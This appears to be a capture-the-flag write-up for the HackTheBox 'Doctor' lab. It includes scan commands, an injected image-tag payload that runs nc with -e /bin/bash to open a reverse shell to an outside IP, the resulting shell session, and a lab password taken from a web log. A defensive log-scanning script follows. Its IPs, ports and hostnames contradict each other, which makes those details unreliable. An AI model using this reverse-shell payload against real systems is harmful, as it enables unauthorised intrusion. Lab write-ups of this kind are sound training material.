Doctor 10.10.10.209
Got User on 5 Jan 2020

Background

Doctor is a Linux machine from HackTheBox. A web application hosted on this server had an XSS vulnerability. Initial access was gained by submitting a reverse-shell XSS payload. A password-change record was then found in the web server log, and the user flag was obtained.
Target Machine: 10.10.10.209
Attacker Machine: 10.10.14.16

Hacking Process Part 0 – Service Scanning

Quick Pre-searching

nmap -p- -T5 --min-rate=1000 10.10.10.209 -oG fkclai.nmap

Details Analysis

nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.209 -oN nmap-result.txt

Enumeration strategies

  1. Check Website Vulnerability
  2. Check any hidden files/folders of the website
  3. Check the website

Hacking Process Part 1 – Enumeration

Visiting the website and reading the page source, it was found that doctor.htb should be added to the hosts file before further enumeration.
A login page was found by visiting http://doctors.htb
Tried gobuster and dirb to find other hidden folders, but the result was negative. Nikto did not have any good news either.
Finally, registered a user account and enumerated the inside. An XSS vulnerability was found in the POST message form.
After several tries, this payload was used to get the reverse shell:
<img src=http://10.10.14.26:8888/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.17.216'$IFS'6666')>
[email protected]:~/Documents/ctf/htb/linux/19-HTB-doctor# nc -nvlp 1234
listening on [any] 6666 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.209] 38714
whoami
web
python3 -c 'import pty;pty.spawn("/bin/bash")'
web@doctor:~$ cd /home/
shaun web
web@doctor:/home$ cd shaun/
web@doctor:/home/shaun$ ls
user.txt
web@doctor:/home/shaun$ cat user.txt
cat: user.txt: Permission denied
web@doctor:/home/shaun$

Hacking Process Part 2 – Gaining Foothold

After the user account "shaun" was found to own user.txt, the enumeration focused on this account. Finally, in the apache2 log, a password-reset request for the account shaun was found in access.log. The password of the user account shaun is Guitar123.
After switching to this user account with sudo, the user flag was found.
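The access.log finding above shows the defensive lesson: any secret that travels in a GET query string ends up in the web server log, readable by whoever can read the log. The Python script below is an added example, not part of the original writeup; it parses Apache combined-format lines and flags query-string values that look like leaked credentials. The sample log lines, the sensitive parameter names and the endpoint pattern are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format, as written by a default apache2 access.log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Assumed rule set: parameter names that never belong in a URL, and endpoints
# where any query-string value deserves a look.
SENSITIVE_PARAMS = {"password", "passwd", "pass", "pwd", "new_password", "token"}
SENSITIVE_PATH_RE = re.compile(r"(reset|password|passwd)", re.IGNORECASE)

def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_leaks(lines):
    """Return (ip, ts, path, param, value, reason) for each request whose URL
    carries a value that should have gone in a request body instead."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        on_sensitive_path = bool(SENSITIVE_PATH_RE.search(url.path))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if not value:
                continue
            if name.lower() in SENSITIVE_PARAMS:
                hits.append((rec["ip"], rec["ts"], url.path, name, value, "sensitive parameter name"))
            elif on_sensitive_path:
                hits.append((rec["ip"], rec["ts"], url.path, name, value, "query string on credential endpoint"))
    return hits

# Constructed sample lines; not taken from the target's real access.log.
SAMPLE_LOG = """\
10.10.14.16 - - [05/Jan/2020:10:00:01 +0000] "GET /login HTTP/1.1" 200 1852 "-" "Mozilla/5.0"
10.10.14.16 - - [05/Jan/2020:10:00:07 +0000] "POST /login HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.10.14.16 - - [05/Jan/2020:10:02:33 +0000] "GET /reset_password?email=EXAMPLE_SECRET HTTP/1.1" 500 453 "-" "Mozilla/5.0"
10.10.14.16 - - [05/Jan/2020:10:03:10 +0000] "GET /api/login?user=shaun&password=EXAMPLE_PW HTTP/1.1" 401 88 "-" "curl/7.68"
"""

if __name__ == "__main__":
    for ip, ts, path, name, value, reason in find_leaks(SAMPLE_LOG.splitlines()):
        print(f"{ts} {ip} {path} {name}={value!r} ({reason})")
```

The fix on the application side is to accept secrets only in POST bodies, which Apache does not log by default, and to scrub query strings with a LogFormat that omits them on credential endpoints.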